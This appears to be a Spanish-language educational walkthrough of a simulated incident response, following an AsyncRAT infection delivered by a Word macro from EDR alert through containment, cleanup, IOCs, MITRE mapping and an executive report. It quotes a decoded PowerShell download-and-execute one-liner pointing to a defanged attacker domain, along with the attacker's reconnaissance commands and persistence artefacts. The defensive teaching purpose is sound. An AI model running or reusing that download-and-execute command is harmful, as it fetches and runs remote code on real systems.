De Alerta EDR a Informe Ejecutivo: Caso End-to-End Completo
Caso completo end-to-end desde una alerta EDR por PowerShell sospechoso hasta el informe ejecutivo final. Triage, investigación, escalación, contención, erradicación, recuperación, lecciones aprendidas y redacción del informe para dirección.
La alerta
Miércoles, 10:23 AM. La consola del EDR (CrowdStrike Falcon en este escenario, aunque el flujo aplica a cualquier EDR) genera una alerta de severidad MEDIA:
ALERT: Suspicious PowerShell Execution
Severity: MEDIUM
Host: WS-SALES-07 (10.0.2.47)
User: m.fernandez (Marketing)
Process: powershell.exe
Parent Process: WINWORD.EXE
Command Line: powershell.exe -NoP -W Hidden -Enc SQBFAF...
Detection: T1059.001 (Command and Scripting Interpreter: PowerShell)
Action: DETECTED (not blocked, policy is detect-only for encoded PowerShell)
La alerta llega al dashboard del SOC donde hay 47 alertas abiertas del turno de mañana. El analista N1 la clasifica como prioritaria porque:
- PowerShell lanzado desde Word (proceso hijo inusual)
- Flags
-NoP -W Hidden(bypass de perfil y ventana oculta) - Contenido codificado en Base64 (
-Enc) - Usuario de Marketing (no es perfil técnico que use PowerShell)
Fase 1: Triage (15 minutos)
Objetivo del triage
Determinar si la alerta es un verdadero positivo (VP), falso positivo (FP) o indeterminado. El triage no es una investigación completa. Es una clasificación rápida.
Pasos del analista N1
Paso 1: Verificar el usuario y el equipo (2 min)
Consulta AD: m.fernandez
Departamento: Marketing
Cargo: Marketing Manager
Último login: hoy 09:15
Equipo asignado: WS-SALES-07
Historial de alertas: 0 alertas previas
Un usuario de Marketing sin historial de alertas ejecutando PowerShell codificado desde Word. No es comportamiento esperado.
Paso 2: Decodificar el comando PowerShell (3 min)
# Decodificar Base64 del -Enc
[System.Text.Encoding]::Unicode.GetString(
[System.Convert]::FromBase64String("SQBFAF...")
)
Resultado decodificado:
IEX (New-Object Net.WebClient).DownloadString(
'http://cdn-office365[.]com/update/config.ps1'
)
Descarga y ejecuta un script remoto desde un dominio que imita Microsoft Office 365.
Paso 3: Verificar el dominio (3 min)
Consulta VirusTotal: cdn-office365[.]com
Detections: 12/87 vendors
Created: 2026-06-01 (hace 4 días)
Registrar: Namecheap
IP: 193.142.59[.]21 (AS 55990, Serverius B.V.)
Tags: malware, phishing
Dominio de 4 días, ya flaggeado como malicioso. Verdadero positivo confirmado.
Paso 4: Verificar el documento Word origen (5 min)
El EDR muestra que WINWORD.EXE abrió un archivo: Propuesta_Colaboracion_Q4.docm
Hash SHA256: f3e4d5c6b7a8...
Origen: email de soporte@empresa-partner[.]xyz (recibido hoy 10:18)
VirusTotal: 8/62 detections
Tags: macro, downloader
Un documento Word con macros recibido por email hace 5 minutos, que al abrirlo ejecuta PowerShell codificado para descargar un payload remoto.
Clasificación del triage
Resultado: VERDADERO POSITIVO CONFIRMADO
Severidad revisada: ALTA (de MEDIA)
Razón: Cadena email > Word macro > PowerShell > descarga payload
Escalación: N2 inmediata
Tiempo de triage: 13 minutos. El analista N1 escala con toda la información recopilada.
Fase 2: Investigación (N2, 2 horas)
Preguntas a responder
- ¿Se descargó y ejecutó el payload de segunda etapa?
- ¿Hay persistencia establecida en el equipo?
- ¿Hay indicadores de movimiento lateral?
- ¿Hay otros equipos afectados por el mismo email?
Investigación del payload
El EDR muestra la cadena de procesos completa:
WINWORD.EXE (PID 4892)
└── powershell.exe (PID 7234) -NoP -W Hidden -Enc SQBFAF...
└── powershell.exe (PID 8901) (descargado de cdn-office365[.]com)
└── rundll32.exe (PID 9123) (carga DLL desde AppData\Local\Temp)
El payload de segunda etapa (config.ps1) descargó y ejecutó una DLL mediante rundll32.exe. La DLL está en:
C:\Users\m.fernandez\AppData\Local\Temp\msupdate.dll
SHA256: a8b7c6d5e4f3...
VirusTotal: 22/72 detections
Family: AsyncRAT variant
Resultado: se ejecutó el payload. El equipo tiene un RAT (Remote Access Trojan) activo.
Verificar persistencia
Sysmon Event ID 13 (Registry Value Set):
Image: rundll32.exe
TargetObject: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdate
Details: rundll32.exe "C:\Users\m.fernandez\AppData\Local\Temp\msupdate.dll",Entry
Sysmon Event ID 11 (File Create):
Image: powershell.exe
TargetFilename: C:\Users\m.fernandez\AppData\Roaming\Microsoft\Windows\Start Menu\
Programs\Startup\defender-update.vbs
Dos mecanismos de persistencia: clave de registro Run y script VBS en la carpeta Startup. Técnicas T1547.001 y T1547.001 respectivamente.
Verificar comunicación C2
Sysmon Event ID 3 (Network Connection):
Image: rundll32.exe
DestinationIp: 193.142.59[.]21
DestinationPort: 8443
Protocol: tcp
Frequency: every 30-45 seconds (beacon pattern with jitter)
El RAT está activo y comunicándose con el C2 cada 30 a 45 segundos. El beacon está activo desde las 10:25 (hace 2 horas).
Verificar actividad del atacante
Revisar qué comandos ha ejecutado el RAT en las 2 horas que lleva activo:
Sysmon Event ID 1 (Process Create) - procesos hijos de rundll32.exe:
10:27 whoami /all
10:28 ipconfig /all
10:29 net user /domain
10:30 net group "Domain Admins" /domain
10:35 systeminfo
10:40 tasklist /v
10:45 dir C:\Users\m.fernandez\Documents
10:50 dir C:\Users\m.fernandez\Desktop
11:15 nltest /dclist:CONTOSO
El atacante está en fase de reconocimiento (Discovery). Ha enumerado usuarios del dominio, administradores, información del sistema y ha listado archivos del usuario. Aún no ha intentado credential dumping ni movimiento lateral.
Verificar otros equipos afectados
Buscar el mismo email en el gateway de correo:
Búsqueda en email gateway:
From: soporte@empresa-partner[.]xyz
Subject: "Propuesta Colaboracion Q4"
Attachment: Propuesta_Colaboracion_Q4.docm
Resultados:
- [email protected] ENTREGADO 10:18 (abierto)
- [email protected] ENTREGADO 10:18 (no abierto)
- [email protected] BLOQUEADO 10:18 (filtro de adjuntos)
El email se envió a 3 destinatarios. Solo m.fernandez abrió el adjunto. l.garcia lo recibió pero no lo abrió. j.martinez fue bloqueado por el filtro de adjuntos.
Resumen de la investigación N2
Estado: INCIDENTE CONFIRMADO - RAT ACTIVO
Equipos comprometidos: 1 (WS-SALES-07)
Credenciales comprometidas: No confirmado (sin credential dumping observado)
Exfiltración: No observada (solo reconocimiento)
Movimiento lateral: No observado
Fase del atacante: Discovery (MITRE ATT&CK)
Tiempo de compromiso: ~2 horas
Riesgo: ALTO (RAT activo con beacon cada 30s, atacante activo)
Escalación a N3 para contención y erradicación.
Fase 3: Contención
Decisión de contención
El N3 decide contención inmediata porque:
- El RAT está activo y el atacante está ejecutando comandos
- El atacante ya tiene la lista de Domain Admins
- El siguiente paso lógico es credential dumping o movimiento lateral
- Cada minuto aumenta el riesgo
Acciones de contención (ejecutadas en paralelo)
Acción 1: Aislamiento del endpoint (1 min)
EDR > Host Management > WS-SALES-07 > Network Containment > Enable
El EDR aísla el equipo de la red, cortando toda comunicación excepto con la consola del EDR. El beacon C2 se interrumpe inmediatamente.
Acción 2: Bloqueo del C2 en el firewall (2 min)
# Firewall perimetral: bloquear la IP del C2
# 193.142.59[.]21 en ambas direcciones
# cdn-office365[.]com en el DNS sinkhole
Acción 3: Bloqueo del email (3 min)
Email Gateway > Message Trace > buscar SHA256 del adjunto
> Purge all copies from all mailboxes
> Block sender domain: empresa-partner[.]xyz
Eliminación del email de la bandeja de l.garcia (que no lo había abierto) y bloqueo del dominio del remitente.
Acción 4: Reset de credenciales (5 min)
AD > m.fernandez > Reset Password > Force change at next logon
AD > m.fernandez > Disable Account (temporal)
Aunque no se observó credential dumping, se resetea la contraseña preventivamente. La cuenta se deshabilita hasta que se complete la erradicación.
Fase 4: Erradicación
Recopilación de evidencia forense
Antes de limpiar, recopilar evidencia:
# 1. Memoria RAM (via EDR o remotamente)
# CrowdStrike RTR (Real Time Response):
memdump --output \\forensics-share\cases\INC-2026-0147\WS-SALES-07-memdump.raw
# 2. Triage forense (artefactos clave)
# Recopilar via KAPE o script personalizado:
# - Registry hives (SAM, SYSTEM, SOFTWARE, NTUSER.DAT)
# - Prefetch files
# - Event logs (Security, System, Sysmon)
# - Browser history y cache
# - Archivos del directorio Temp del usuario
# 3. Copia del documento malicioso
# Ya retenido por el EDR en cuarentena
Limpieza del equipo
# 1. Eliminar el RAT
Remove-Item "C:\Users\m.fernandez\AppData\Local\Temp\msupdate.dll" -Force
# 2. Eliminar persistencia - Registry Run key
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
-Name "WindowsDefenderUpdate"
# 3. Eliminar persistencia - Startup folder
Remove-Item "C:\Users\m.fernandez\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defender-update.vbs" -Force
# 4. Eliminar documento malicioso
Remove-Item "C:\Users\m.fernandez\Downloads\Propuesta_Colaboracion_Q4.docm" -Force
# 5. Limpiar prefetch y temp
Remove-Item "C:\Users\m.fernandez\AppData\Local\Temp\*" -Force -Recurse
Verificación post-limpieza
# Verificar que no hay procesos maliciosos
Get-Process | Where-Object {$_.Path -like "*msupdate*" -or $_.Path -like "*rundll32*"}
# Verificar que no hay persistencia residual
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
# Verificar tareas programadas
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft\*"}
# Verificar servicios nuevos
Get-Service | Where-Object {$_.Status -eq "Running"} | Sort-Object StartType
Fase 5: Recuperación
Restaurar servicio
1. Desaislar el endpoint en el EDR
2. Verificar conectividad de red
3. Habilitar la cuenta de m.fernandez con nueva contraseña
4. Contactar al usuario para verificar acceso
5. Monitorización intensiva durante 72 horas:
- Alertas adicionales en WS-SALES-07
- Regla temporal: cualquier ejecución de PowerShell desde Word genera alerta CRÍTICA
Verificación de no-reinfección
24 horas después:
- Sin alertas en WS-SALES-07
- Sin conexiones salientes sospechosas
- Sin procesos anómalos
- m.fernandez reporta funcionamiento normal
48 horas después:
- Monitorización sin hallazgos
- Se reduce la monitorización intensiva a nivel normal
72 horas después:
- Incidente cerrado operativamente
- Se mantienen las reglas de detección mejoradas
Fase 6: Lecciones aprendidas
Reunión post-incidente
Participantes: SOC N1, N2, N3, responsable de email security, CISO.
Qué funcionó
| Aspecto | Detalle |
|---|---|
| Triage rápido | 13 minutos de triage. N1 clasificó correctamente y escaló con contexto completo |
| Visibilidad del EDR | La cadena de procesos completa (Word > PowerShell > rundll32) fue visible desde la alerta |
| Contención rápida | Aislamiento del endpoint en menos de 1 minuto via EDR |
| Fase temprana del atacante | Se contuvo durante la fase de Discovery, antes de credential dumping o lateral movement |
Qué falló
| Aspecto | Detalle | Acción correctiva |
|---|---|---|
| Macros habilitadas | Word permitía ejecutar macros de documentos descargados de Internet | Bloquear macros en documentos de Internet via GPO (Mark of the Web) |
| PowerShell sin bloqueo | La política de EDR era "detect-only" para PowerShell codificado | Cambiar a "block" para PowerShell con -Enc lanzado desde Office |
| Email pasó filtros | El adjunto .docm no fue bloqueado por el gateway de email | Bloquear adjuntos .docm, .xlsm de remitentes externos no verificados |
| Sin sandbox de email | El email no pasó por sandbox de adjuntos | Implementar sandbox para adjuntos de Office con macros |
Métricas del incidente
MTTD (Mean Time to Detect): 5 minutos (desde ejecución hasta alerta EDR)
MTTT (Mean Time to Triage): 13 minutos
MTTI (Mean Time to Investigate): 2 horas
MTTC (Mean Time to Contain): 2 horas 15 minutos (desde alerta hasta contención)
MTTR (Mean Time to Recover): 4 horas (desde contención hasta servicio restaurado)
Sistemas comprometidos: 1 de ~500 (0.2%)
Datos exfiltrados: 0 bytes confirmados
Credenciales comprometidas: 0 confirmadas (reset preventivo)
Downtime del usuario: 6 horas
Fase 7: Redacción del informe ejecutivo
Por qué el informe ejecutivo importa
El equipo técnico sabe lo que pasó. El CISO, el CFO y el CEO necesitan saberlo en otros términos: impacto en el negocio, riesgo residual, coste del incidente y coste de las mejoras necesarias. Un informe ejecutivo que habla de Event IDs y hashes SHA256 no cumple su función.
Estructura del informe
El informe ejecutivo sigue esta estructura (1 a 2 páginas):
INFORME DE INCIDENTE DE SEGURIDAD
Referencia: INC-2026-0147 Clasificación: CONFIDENCIAL Fecha: 5 de junio de 2026 Autor: [Responsable de seguridad] Distribución: CISO, CTO, Director de Operaciones
1. RESUMEN EJECUTIVO
El miércoles 5 de junio a las 10:23, el equipo de seguridad detectó y contuvo un intento de intrusión dirigido contra un equipo del departamento de Marketing. Un empleado recibió un email con un documento adjunto que, al abrirlo, instaló software de acceso remoto (RAT) en su estación de trabajo. El atacante estuvo activo durante aproximadamente 2 horas realizando reconocimiento de la red antes de ser detectado y bloqueado. No se produjo robo de datos ni compromiso de sistemas críticos.
2. TIMELINE SIMPLIFICADA
| Hora | Evento |
|---|---|
| 10:18 | Email malicioso recibido por 3 empleados |
| 10:23 | Un empleado abre el adjunto, se instala malware |
| 10:23 | Sistema EDR genera alerta de actividad sospechosa |
| 10:36 | Alerta clasificada como incidente confirmado |
| 12:38 | Equipo aislado de la red, atacante bloqueado |
| 14:30 | Malware eliminado, equipo restaurado |
| 16:30 | Servicio completamente restablecido |
3. IMPACTO
- Sistemas afectados: 1 estación de trabajo (de ~500 equipos)
- Datos comprometidos: ninguno confirmado
- Operaciones interrumpidas: 1 empleado sin acceso durante 6 horas
- Coste directo estimado: ~800 EUR (horas de equipo SOC + IT)
- Riesgo materializado: bajo (contención en fase temprana)
4. CAUSA RAIZ
Un email de phishing dirigido con un documento Word que contenía código malicioso. El documento fue abierto por un empleado del departamento de Marketing. El software de seguridad detectó la actividad maliciosa pero estaba configurado en modo "detectar" en lugar de "bloquear" para este tipo específico de ataque.
5. ACCIONES TOMADAS
- Equipo infectado aislado y limpiado
- Email malicioso eliminado de todos los buzones
- Contraseñas del empleado afectado reseteadas
- Dominio del atacante bloqueado en toda la red
- Monitorización intensiva durante 72 horas (sin recurrencia)
6. RECOMENDACIONES
| Acción | Prioridad | Coste estimado | Plazo |
|---|---|---|---|
| Bloquear macros en documentos de Internet | Alta | 0 EUR (GPO) | 1 semana |
| Cambiar política EDR a bloqueo para PowerShell desde Office | Alta | 0 EUR (config) | 48 horas |
| Bloquear adjuntos .docm de remitentes externos | Alta | 0 EUR (config) | 48 horas |
| Implementar sandbox de adjuntos de email | Media | ~5.000 EUR/año | 1 mes |
| Formación anti-phishing trimestral | Media | ~2.000 EUR/año | Recurrente |
7. ESTADO ACTUAL
El incidente está resuelto. No hay actividad maliciosa residual. Las 3 primeras recomendaciones (coste 0) se implementarán esta semana. Las 2 restantes requieren aprobación de presupuesto.
Errores comunes en informes ejecutivos
-
Demasiado técnico: el CEO no necesita saber que fue AsyncRAT con beacon de 30 segundos al puerto 8443. Necesita saber que se instaló software de acceso remoto que fue detectado y eliminado.
-
Sin cuantificar impacto: "fue un incidente grave" no comunica nada. "1 equipo afectado de 500, 0 datos robados, 6 horas de downtime para 1 usuario" es concreto y permite evaluar el riesgo.
-
Recomendaciones sin coste: las recomendaciones sin coste estimado no se aprueban. Separar las que son gratuitas (cambios de configuración) de las que requieren presupuesto facilita la decisión.
-
Culpar al usuario: "el empleado hizo clic en un adjunto malicioso" es un hecho, no una causa raíz. La causa raíz es que los controles permitieron que un documento con macros maliciosas llegara al buzón del usuario y que las macros pudieran ejecutarse. El usuario hizo lo que hacen los usuarios: abrir documentos que parecen legítimos.
-
Sin timeline: los directivos necesitan entender la secuencia temporal para evaluar la velocidad de respuesta. Una timeline de 5 a 8 puntos es suficiente.
Indicadores de compromiso (IOCs)
Hashes (SHA256)
| Tipo | Hash | Descripción |
|---|---|---|
| Documento Word | f3e4d5c6b7a8... | Propuesta_Colaboracion_Q4.docm |
| DLL (AsyncRAT) | a8b7c6d5e4f3... | msupdate.dll (RAT payload) |
| PowerShell script | c6d7e8f9a0b1... | config.ps1 (descargador segunda etapa) |
Infraestructura
| Tipo | Valor | Descripción |
|---|---|---|
| Dominio | cdn-office365[.]com | Distribución del payload |
| IPv4 | 193.142.59[.]21 | C2 del RAT |
| Puerto | 8443 | Beacon HTTPS |
soporte@empresa-partner[.]xyz | Remitente phishing | |
| URI | /update/config.ps1 | Descarga segunda etapa |
Artefactos del sistema
| Tipo | Valor |
|---|---|
| Archivo | C:\Users\*\AppData\Local\Temp\msupdate.dll |
| Registry | HKCU\...\Run\WindowsDefenderUpdate |
| Startup | defender-update.vbs en carpeta Startup |
| Proceso | rundll32.exe cargando msupdate.dll |
Mapeo MITRE ATT&CK
| Táctica | Técnica | ID | Uso en este caso |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 | Email con .docm adjunto |
| Execution | User Execution: Malicious File | T1204.002 | Usuario abre documento con macros |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell codificado descarga payload |
| Persistence | Boot or Logon Autostart: Registry Run Keys | T1547.001 | Clave Run y script Startup |
| Defense Evasion | Obfuscated Files or Information: Encoding | T1027 | PowerShell con -Enc Base64 |
| Defense Evasion | System Binary Proxy Execution: Rundll32 | T1218.011 | rundll32.exe carga DLL maliciosa |
| Command and Control | Application Layer Protocol: Web | T1071.001 | HTTPS beacon cada 30-45s |
| Discovery | Account Discovery: Domain Account | T1087.002 | net user /domain, net group |
| Discovery | System Information Discovery | T1082 | systeminfo, tasklist |
| Discovery | Remote System Discovery | T1018 | nltest /dclist |
Timeline completa del incidente
| Hora | Evento | Actor | Fase |
|---|---|---|---|
| 10:18 | Email recibido por 3 destinatarios | Atacante | Initial Access |
| 10:23 | m.fernandez abre el adjunto .docm | Usuario | Execution |
| 10:23 | Macro ejecuta PowerShell codificado | Malware | Execution |
| 10:23 | EDR genera alerta severidad MEDIA | EDR | Detection |
| 10:24 | PowerShell descarga config.ps1 | Malware | Execution |
| 10:25 | rundll32.exe carga msupdate.dll (AsyncRAT) | Malware | Execution |
| 10:25 | Persistencia establecida (Registry + Startup) | Malware | Persistence |
| 10:25 | Primer beacon C2 a 193.142.59[.]21:8443 | RAT | C2 |
| 10:27 | whoami /all, ipconfig /all | Atacante | Discovery |
| 10:29 | net user /domain, net group Domain Admins | Atacante | Discovery |
| 10:35 | systeminfo, tasklist | Atacante | Discovery |
| 10:36 | N1 completa triage, escala a N2 | SOC | Triage |
| 10:45 | Atacante lista documentos del usuario | Atacante | Discovery |
| 11:15 | Atacante enumera controladores de dominio | Atacante | Discovery |
| 12:30 | N2 completa investigación, escala a N3 | SOC | Investigation |
| 12:38 | N3 ordena contención: aislamiento EDR | SOC | Containment |
| 12:38 | Beacon C2 interrumpido | - | Containment |
| 12:40 | IP y dominio C2 bloqueados en firewall | SOC | Containment |
| 12:43 | Email malicioso eliminado de todos los buzones | SOC | Containment |
| 12:45 | Password de m.fernandez reseteada, cuenta deshabilitada | SOC | Containment |
| 13:00 | Recopilación de evidencia forense | SOC/Forense | Evidence |
| 13:30 | Eliminación de malware y persistencia | SOC | Eradication |
| 14:00 | Verificación post-limpieza completada | SOC | Eradication |
| 14:30 | Endpoint desaislado, servicio restaurado | SOC/IT | Recovery |
| 14:45 | Cuenta de m.fernandez rehabilitada | IT | Recovery |
| 16:30 | m.fernandez confirma acceso normal | Usuario | Recovery |
| 17:00 | Monitorización intensiva 72h iniciada | SOC | Monitoring |
| +72h | Sin recurrencia, incidente cerrado operativamente | SOC | Closure |
Conclusión
Este caso ilustra el flujo completo de un incidente de seguridad "de libro": alerta, triage, investigación, escalación, contención, erradicación, recuperación e informe. No todos los incidentes son así de lineales (muchos tienen ciclos de investigación y contención que se repiten), pero el flujo base es el mismo.
Los puntos clave para equipos que quieran mejorar su proceso:
-
El triage de 15 minutos es el gate: si no puedes descartarlo como FP en 15 minutos, escala. No pierdas tiempo investigando en profundidad como N1.
-
La contención no espera a la investigación completa: en este caso, contuvimos a las 2 horas 15 minutos. Si hubiéramos esperado a completar toda la investigación forense, el atacante habría tenido 2 horas más para moverse lateralmente.
-
El informe ejecutivo no es un resumen técnico: es un documento de comunicación para personas que toman decisiones de negocio. Habla de impacto, coste y riesgo, no de Event IDs y TTPs.
-
Las lecciones aprendidas que no se implementan no sirven: las 3 acciones correctivas de coste 0 se implementaron en 48 horas. Si se hubieran quedado en un documento, el próximo email con macros habría tenido el mismo resultado.
Preguntas frecuentes
Libros recomendados
Artículos relacionados
Este contenido tiene fines exclusivamente educativos y de investigación en ciberseguridad defensiva. No se proporcionan binarios maliciosos ni payloads ejecutables. El uso indebido de esta información es responsabilidad exclusiva del usuario. Leer disclaimer completo.